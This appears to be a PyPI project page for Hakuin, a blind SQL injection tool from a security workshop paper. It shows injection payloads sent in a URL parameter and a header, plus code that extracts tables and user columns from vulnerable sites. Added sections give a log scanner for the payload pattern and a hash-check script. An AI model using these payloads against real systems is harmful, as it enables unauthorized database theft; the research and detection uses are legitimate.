
Blind SQL Injection optimization and automation framework

Project description

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework and tool written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism, and more.

Hakuin has been presented at esteemed academic and industrial conferences.

More information can be found in our paper and slides.

Installation

To install Hakuin, simply run:

pip3 install hakuin
hk -h

Note that installation is optional and you can use Hakuin directly from the source codes:

git clone https://github.com/pruzko/hakuin
cd hakuin
python3 hk.py -h

Command Line Tool

Hakuin ships with an intuitive tool called hk that offers most of Hakuin's features directly from the command line. To find out more, run:

hk -h

Custom Scripting

Sometimes, BSQLI vulnerabilities are too tricky to be exploited from the command line and require custom scripting. This is where Hakuin's Python package shines, giving you total control over the extraction process.

To customize exploitation, you need to instruct Hakuin on how to inject its queries. This is done by deriving a class from Requester and overriding its request method. Aside from injecting queries, the method must determine whether they resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # aiohttp has no module-level get(); requests go through a ClientSession
        async with aiohttp.ClientSession() as session:
            async with session.get(f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                # the query resolved to True iff the server answered 200
                return r.status == 200

Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                # the query resolved to True iff the response body contains 'found'
                return 'found' in await r.text()
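From the defender's side, the two Requester examples above show what a Hakuin-driven oracle looks like on the wire: the same wrapper (quote, OR, parenthesised subquery, comment) repeated many times with only the subquery changing, one request per yes/no answer. The added Python below is not part of Hakuin; it flags that pattern in constructed access-log lines and assumes Combined Log Format with URL-encoded query strings.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format fields we need: client IP, request target, response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Boolean-oracle shape used by the Requester examples above: a closing quote, OR,
# a parenthesised subquery and a trailing comment. Matched after URL decoding.
ORACLE_RE = re.compile(r"""['"]\s*OR\s*\(.*\)\s*--""", re.IGNORECASE | re.DOTALL)

# Constructed sample log (not real traffic): one client repeats the oracle shape with
# only the subquery changing, and the status alternates as the oracle answers.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:{i:02d} +0000] '
    f'"GET /?n=XXX%22%20OR%20(SELECT%20v%3E{64 + i}%20FROM%20t)%20-- HTTP/1.1" '
    f'{200 if i % 2 else 500} 512'
    for i in range(10)
] + [
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /?n=42 HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /search?q=%22OR%22 HTTP/1.1" 200 512',
]

def oracle_params(target):
    """Names of query parameters whose decoded value has the oracle shape."""
    query = urlsplit(target).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if ORACLE_RE.search(v)]

def scan(lines, burst_threshold=8):
    """Count oracle-shaped requests per client and report clients at or above the
    threshold with their status distribution. Caveat: payloads carried in headers
    (Example 2 above) are only visible if the server logs that header."""
    hits = Counter()
    statuses = defaultdict(Counter)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if oracle_params(m['target']):
            hits[m['ip']] += 1
            statuses[m['ip']][int(m['status'])] += 1
    return {ip: {'hits': n, 'statuses': dict(statuses[ip])}
            for ip, n in hits.items() if n >= burst_threshold}

if __name__ == '__main__':
    for ip, info in scan(SAMPLE_LOG).items():
        print(f"{ip}: {info['hits']} oracle-shaped requests, statuses {info['statuses']}")
```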

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), MSSQL (SQL Server), and OracleDB, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL/OracleDB
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL, OracleDB

class StatusRequester(Requester):
    ...

async def main():
    ext = Extractor(requester=StatusRequester(), dbms=SQLite())
    ...

if __name__ == '__main__':
    # asyncio.run() replaces the deprecated get_event_loop().run_until_complete()
    asyncio.run(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas/Tables/Columns
# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')             # extracts schema names
tables = await ext.extract_table_names(strategy='model')                    # extracts table names
columns = await ext.extract_column_names(table='users', strategy='model')   # extracts column names
metadata = await ext.extract_meta(strategy='model')                         # extracts all table and column names

Once you know the DB structure, you can extract the actual content.

Example 1 - Extracting Column Data
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')    # detects types and extracts columns

# strategy:
#   'binary':       Use binary search
#   'fivegram':     Use five-gram model
#   'unigram':      Use unigram model
#   'dynamic':      Dynamically identify the best strategy. This setting
#                   also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')    # extracts text columns
res = await ext.extract_column_int(table='users', column='id')                              # extracts int columns
res = await ext.extract_column_float(table='products', column='price')                      # extracts float columns
res = await ext.extract_column_blob(table='users', column='id')                             # extracts blob columns

More examples can be found in the tests directory.

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}

Download files

Source Distribution

hakuin-0.1.10.tar.gz (5.2 MB; tags: Source; uploaded via twine/5.1.1 CPython/3.10.12; uploaded using Trusted Publishing: No)

Hashes for hakuin-0.1.10.tar.gz

Algorithm    Hash digest
SHA256       ecf150b8e25822176b37bf5cc7c78c3e9259eaef53b6ce15d19f59dab0f5ba8c
MD5          091d889c29e6c7e0cec1c1a039509a80
BLAKE2b-256  51ea7850522bc5bb25dc9e42c2936d850976a591564ba8b386dcefec72aae84f

Built Distribution

hakuin-0.1.10-py3-none-any.whl (5.3 MB; tags: Python 3; uploaded via twine/5.1.1 CPython/3.10.12; uploaded using Trusted Publishing: No)

Hashes for hakuin-0.1.10-py3-none-any.whl

Algorithm    Hash digest
SHA256       83fa348525980ccf8eb61f846745c21cd922d091ccb5e29393f99878dbd20412
MD5          be0afec4a8a48a840c00a8a73fe3faa9
BLAKE2b-256  3811fe0b390916c3b0dab3509b3b607ce25165e62db1281c427c2b672117c0ea
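As a supply-chain check before installing, the added script below (not part of the Hakuin project) recomputes a downloaded release file's SHA256 and compares it with the digests listed above; it assumes sha256sum or shasum is available on the path.

```shell
#!/bin/sh
# Added example, not part of the Hakuin project: check a downloaded release file
# against the SHA256 digests published on this page before installing it.
# Digests copied from the "File hashes" tables above.
HAKUIN_SDIST_SHA256=ecf150b8e25822176b37bf5cc7c78c3e9259eaef53b6ce15d19f59dab0f5ba8c
HAKUIN_WHEEL_SHA256=83fa348525980ccf8eb61f846745c21cd922d091ccb5e29393f99878dbd20412

sha256_of() {
    # Portable digest: sha256sum (coreutils) with shasum (macOS/BSD) as fallback.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_release_file <path> <expected-sha256>: 0 on match, 1 on mismatch or missing file.
verify_release_file() {
    file=$1
    expected=$2
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    actual=$(sha256_of "$file")
    if [ "$actual" = "$expected" ]; then
        echo "OK: $file"
        return 0
    fi
    echo "MISMATCH: $file has $actual, expected $expected" >&2
    return 1
}

# Typical use after fetching the artifacts without installing them
# (pip3 download --no-deps hakuin==0.1.10):
#   verify_release_file hakuin-0.1.10.tar.gz "$HAKUIN_SDIST_SHA256"
#   verify_release_file hakuin-0.1.10-py3-none-any.whl "$HAKUIN_WHEEL_SHA256"
```

pip can enforce the same pins through --hash entries in a requirements file installed with --require-hashes, but that mode requires a hash for every dependency as well.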
